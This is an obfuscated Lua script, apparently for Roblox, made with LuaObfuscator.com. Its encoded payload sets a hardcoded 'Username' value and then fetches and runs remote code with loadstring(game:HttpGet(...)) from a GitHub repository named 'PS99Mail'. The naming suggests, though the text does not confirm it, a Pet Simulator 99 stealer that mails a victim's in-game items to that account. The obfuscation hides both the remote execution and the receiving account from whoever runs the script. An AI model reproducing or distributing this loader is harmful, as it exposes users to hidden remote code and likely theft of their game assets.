--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v88=v5(v83,v19);v19=nil;return v88;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(1 + 0))))%((5 -3)^(((v33-(1 -(877 -(282 + 595)))) -(v32-(2 -(1638 -(1523 + 114))))) + (620 -(499 + 56 + 64)))) ;return v84-(v84%((1328 -396) -(857 + 74))) ;else local v85=(570 -(367 + 201))^(v32-1) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 + (1065 -(68 + 997))) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37=0;local v38;local v39;local v40;local v41;while true do if (v37==(1 + 0)) then return (v41 * (3720433 + (13057133 -(87 + 263)))) + (v40 * (66493 -(892 + 65))) + (v39 * 256) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v37=1 -0 ;end end end local function v24()local v42=(318 -138) -(67 + 113) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 + 0)) then if (v47==0) then if (v46==((0 + 0) -0)) then return v48 * (0 + 0) ;else local v100=0 -0 ;while true do if (v100==(952 -(802 + 150))) then v47=1;v45=0 -0 ;break;end end end elseif (v47==((3040 + 672) -1665)) then return ((v46==(0 + 0)) and (v48 * ((998 -(915 + 82))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(596 + (1199 -(201 + 571))) ) * (v45 + (v46/((2 -0)^(1239 -(1069 + 118))))) ;end if (v42==((1138 -(116 + 1022)) -(438 -(145 + 293)))) then v43=v23();v44=v23();v42=(4 -3) -0 ;end if (v42==(1 + 1)) then v47=v20(v44,37 -16 ,31);v48=((v20(v44,19 + 13 + (430 -(44 + 386)) )==(792 -(368 + 423))) and  -1) or (3 -2) ;v42=(74 -53) -(10 + 8) ;end if (v42==1) then v45=3 -2 ;v46=(v20(v44,443 -(416 + 26) ,63 -43 ) * (2^(14 + 18))) + v43 ;v42=1488 -(998 + 488) ;end end end local function v25(v49)local v50=0;local v51;local v52;while true do if (v50==((2964 -2103) -(814 + (1792 -(760 + 987))))) then v52={};for v89=2 -1 , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=1 + 2 ;end if (v50==((1913 -(1789 + 124)) + 0)) then v51=nil;if  not v49 then local v95=885 -(261 + 624) ;while true do if ((0 -0)==v95) then v49=v23();if (v49==(1080 -(1020 + (826 -(745 + 21))))) then return "";end break;end end end v50=1424 -(217 + 413 + 793) ;end if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;v50=1 + 1 ;end if (v50==(7 -4)) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if ((988 -(676 + 311))==v53) then v56=nil;v57=nil;v53=2;end if (v53==2) then v58=nil;v59=nil;v53=1 + 2 ;end if ((11 -7)==v53) then v62=nil;while true do if (v54==0) then local v98=0;while true do if (v98~=(0 -0)) then else v55=0;v56=nil;v98=1;end if (v98==(115 -(4 + 110))) then v54=1;break;end end end if (3~=v54) then else v61=nil;v62=nil;v54=4;end if (v54==2) then v59=nil;v60=nil;v54=587 -(57 + 527) ;end if (v54==(1431 -(41 + 1386))) then while true do if (v55==(106 -(17 + 86))) then v62=nil;while true do local v106=0 + 0 ;local v107;while true do if (v106==(0 -0)) then v107=0;while true do if (v107==0) then local v138=0;local v139;while true do if ((0 -0)==v138) then v139=0;while true do if (v139~=(166 -(122 + 44))) then else if (v56==1) then local v180=0;local v181;while true do if (v180~=0) then else v181=0;while true do if (v181~=(1 -0)) then else v62={};v56=6 -4 ;break;end if (v181~=(0 + 0)) then else local v186=0 + 0 ;while true do if (v186~=1) then else v181=1 -0 ;break;end if (v186~=(65 -(30 + 35))) then else v60={v57,v58,nil,v59};v61=v23();v186=1;end end end end break;end end end if (v56~=2) then else local v182=0;local v183;while true do if (v182==0) then v183=0;while true do if (v183==1) then for v188=3 -2 ,v23() do local v189=1212 -(323 + 889) ;local v190;local v191;local v192;while true do if (v189==0) then v190=0 -0 ;v191=nil;v189=581 -(361 + 219) ;end if (v189==(321 -(53 + 267))) then v192=nil;while true do if (v190==0) then local v203=0;local v204;while true do if (v203~=(0 + 0)) then else v204=0;while true do if (1==v204) then v190=1;break;end if (v204~=0) then else local v214=413 -(15 + 398) ;while true do if (1~=v214) then else v204=1;break;end if (v214==(982 -(18 + 964))) then v191=0 -0 ;v192=nil;v214=1;end end end end break;end end end if (1==v190) then while true do if (v191==(0 + 0)) then v192=v21();if (v20(v192,1 + 0 ,851 -(20 + 830) )~=(0 + 0)) then else local v209=0;local v210;local v211;local v212;local v213;while true do if (v209~=2) then else while true do if (v210==1) then local v215=126 -(116 + 10) ;while true do if (v215==0) then v213={v22(),v22(),nil,nil};if (v211==(0 -0)) then local v221=0;while true do if (v221==(0 + 0)) then v213[3]=v22();v213[3 + 1 ]=v22();break;end end elseif (v211==(1 + 0)) then v213[3]=v23();elseif (v211==(4 -2)) then v213[7 -4 ]=v23() -((1553 -(1126 + 425))^16) ;elseif (v211~=(408 -(118 + 287))) then else local v230=0 -0 ;local v231;local v232;local v233;while true do if (v230==0) then v231=0;v232=nil;v230=1;end if (v230~=1) then else v233=nil;while true do if (v231~=(1122 -(118 + 1003))) then else while true do if (v232==(0 -0)) then v233=377 -(142 + 235) ;while true do if (v233==(0 -0)) then v213[1 + 2 ]=v23() -(2^16) ;v213[4]=v22();break;end end break;end end break;end if (v231~=(977 -(553 + 424))) then else local v234=0 -0 ;while true do if (v234==(0 + 0)) then v232=0 + 0 ;v233=nil;v234=1;end if (v234~=1) then else v231=1 + 0 ;break;end end end end break;end end end v215=1 + 0 ;end if (1==v215) then v210=2;break;end end end if (v210==2) then local v216=0 + 0 ;while true do if (v216~=1) then else v210=3;break;end if (v216~=(0 -0)) then else local v220=0;while true do if (v220==(0 -0)) then if (v20(v212,2 -1 ,1 + 0 )==(4 -3)) then v213[2]=v62[v213[755 -(239 + 514) ]];end if (v20(v212,2,1 + 1 )==1) then v213[1332 -(797 + 532) ]=v62[v213[3 + 0 ]];end v220=1 + 0 ;end if (v220==1) then v216=1;break;end end end end end if (v210==3) then if (v20(v212,3,3)==(2 -1)) then v213[1206 -(373 + 829) ]=v62[v213[735 -(476 + 255) ]];end v57[v188]=v213;break;end if (v210~=0) then else v211=v20(v192,1132 -(369 + 761) ,2 + 1 );v212=v20(v192,4,10 -4 );v210=1;end end break;end if (v209==(1 -0)) then v212=nil;v213=nil;v209=240 -(64 + 174) ;end if (v209==0) then v210=0 + 0 ;v211=nil;v209=1;end end end break;end end break;end end break;end end end v56=3 -0 ;break;end if ((336 -(144 + 192))==v183) then for v193=217 -(42 + 174) ,v61 do local v194=0;local v195;local v196;local v197;local v198;while true do if (v194~=(2 + 0)) then else while true do if (v195==(0 + 0)) then local v205=0 + 0 ;while true do if (v205==(1505 -(363 + 1141))) then v195=1581 -(1183 + 397) ;break;end if (v205==0) then v196=0;v197=nil;v205=1;end end end if (v195~=(2 -1)) then else v198=nil;while true do if (v196==(0 + 0)) then local v206=0;local v207;while true do if (v206==0) then v207=0 + 0 ;while true do if ((1975 -(1913 + 62))~=v207) then else v197=v21();v198=nil;v207=1;end if (v207==1) then v196=1 + 0 ;break;end end break;end end end if (v196==1) then if (v197==(2 -1)) then v198=v21()~=0 ;elseif (v197==(1935 -(565 + 1368))) then v198=v24();elseif (v197==3) then v198=v25();end v62[v193]=v198;break;end end break;end end break;end if (v194==1) then local v199=0;while true do if (v199~=(0 -0)) then else v197=nil;v198=nil;v199=1662 -(1477 + 184) ;end if (v199~=(1 -0)) then else v194=2 + 0 ;break;end end end if (v194~=0) then else local v200=856 -(564 + 292) ;while true do if (v200==(1 -0)) then v194=1;break;end if (0~=v200) then else v195=0 -0 ;v196=nil;v200=1;end end end end end v60[3]=v21();v183=305 -(244 + 60) ;end end break;end end end v139=1 + 0 ;end if (v139==1) then v107=1;break;end end break;end end end if ((477 -(41 + 435))==v107) then if (3==v56) then local v168=1001 -(938 + 63) ;local v169;local v170;while true do if (v168==(1 + 0)) then while true do if (v169==0) then v170=0;while true do if (v170==0) then local v184=1125 -(936 + 189) ;local v185;while true do if (v184==(0 + 0)) then v185=0;while true do if (0==v185) then for v201=1,v23() do v58[v201-1 ]=v28();end return v60;end end break;end end end end break;end end break;end if (v168~=(1613 -(1565 + 48))) then else v169=0;v170=nil;v168=1;end end end if (v56==(0 + 0)) then local v171=1138 -(782 + 356) ;while true do if (v171==(268 -(176 + 91))) then v59={};v56=2 -1 ;break;end if (v171==(0 -0)) then local v178=0;local v179;while true do if (v178==0) then v179=1092 -(975 + 117) ;while true do if (v179==(1876 -(157 + 1718))) then v171=1;break;end if (v179~=0) then else v57={};v58={};v179=1;end end break;end end end end end break;end end break;end end end break;end if (v55~=(1 + 0)) then else local v101=0;local v102;while true do if (v101~=0) then else v102=0 -0 ;while true do if (v102==(0 -0)) then v58=nil;v59=nil;v102=1019 -(697 + 321) ;end if (v102==1) then v55=2;break;end end break;end end end if ((0 -0)~=v55) then else local v103=0;while true do if (v103==(0 -0)) then v56=0 -0 ;v57=nil;v103=1;end if ((1 + 0)~=v103) then else v55=1 -0 ;break;end end end if (v55==2) then local v104=0;local v105;while true do if (v104==0) then v105=0;while true do if (1~=v105) then else v55=7 -4 ;break;end if (v105==(1227 -(322 + 905))) then local v134=0;while true do if (v134==(612 -(602 + 9))) then v105=1;break;end if (v134==0) then v60=nil;v61=nil;v134=1190 -(449 + 740) ;end end end end break;end end end end break;end if (v54~=(873 -(826 + 46))) then else local v99=0;while true do if (v99~=(948 -(245 + 702))) then else v54=6 -4 ;break;end if (v99~=(0 + 0)) then else v57=nil;v58=nil;v99=1899 -(260 + 1638) ;end end end end break;end if (v53==(443 -(382 + 58))) then v60=nil;v61=nil;v53=4;end if (v53==(0 -0)) then v54=0 + 0 ;v55=nil;v53=1 -0 ;end end end local function v29(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v69=v66;local v70=v67;local v71=v68;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v87=0;while true do if (v87==1) then if (v82<=5) then if (v82<=2) then if (v82<=0) then for v110=v81[2],v81[3] do v79[v110]=nil;end elseif (v82==1) then do return;end else v79[v81[2]]=v81[3];end elseif (v82<=3) then v65[v81[3]]=v79[v81[2]];elseif (v82>4) then v73=v81[3];elseif ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v65;else v79[v81[2]]=v65[v81[3]];end elseif (v82<=8) then if (v82<=6) then v79[v81[2]]();elseif (v82>7) then local v115=v81[2];local v116,v117=v72(v79[v115](v13(v79,v115 + 1 ,v81[3])));v74=(v117 + v115) -1 ;local v118=0;for v131=v115,v74 do v118=v118 + 1 ;v79[v131]=v116[v118];end else local v119=0;local v120;local v121;while true do if (v119==0) then v120=v81[2];v121=v79[v81[3]];v119=1;end if (v119==1) then v79[v120 + 1 ]=v121;v79[v120]=v121[v81[4]];break;end end end elseif (v82<=9) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82==10) then local v123=0;local v124;local v125;local v126;local v127;local v128;while true do if (v123==9) then v73=v81[3];break;end if (v123==5) then v73=v73 + 1 ;v81=v69[v73];v128=v81[2];v125,v126=v72(v79[v128](v13(v79,v128 + 1 ,v81[3])));v123=6;end if (v123==8) then v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];v123=9;end if (v123==4) then v79[v128]=v127[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v123=5;end if (v123==2) then v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v65;else v79[v81[2]]=v65[v81[3]];end v73=v73 + 1 ;v123=3;end if (v123==3) then v81=v69[v73];v128=v81[2];v127=v79[v81[3]];v79[v128 + 1 ]=v127;v123=4;end if (v123==6) then v74=(v126 + v128) -1 ;v124=0;for v165=v128,v74 do v124=v124 + 1 ;v79[v165]=v125[v124];end v73=v73 + 1 ;v123=7;end if (v123==1) then v65[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];if ((v81[3]=="_ENV") or (v81[3]=="getfenv")) then v79[v81[2]]=v65;else v79[v81[2]]=v65[v81[3]];end v123=2;end if (v123==0) then v124=nil;v125,v126=nil;v127=nil;v128=nil;v123=1;end if (v123==7) then v81=v69[v73];v128=v81[2];v79[v128]=v79[v128](v13(v79,v128 + 1 ,v74));v73=v73 + 1 ;v123=8;end end else local v129=v81[2];v79[v129]=v79[v129](v13(v79,v129 + 1 ,v74));end v73=v73 + 1 ;break;end if (v87==0) then v81=v69[v73];v82=v81[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030A3O00434855545958424E4554030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012023O00016O000100013O0026093O0002000100010004053O00020001001202000100013O00260900010005000100010004053O00050001001202000200033O00120A000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O001400010004053O000500010004053O001400010004053O000200012O00013O00017O00",v9(),...);
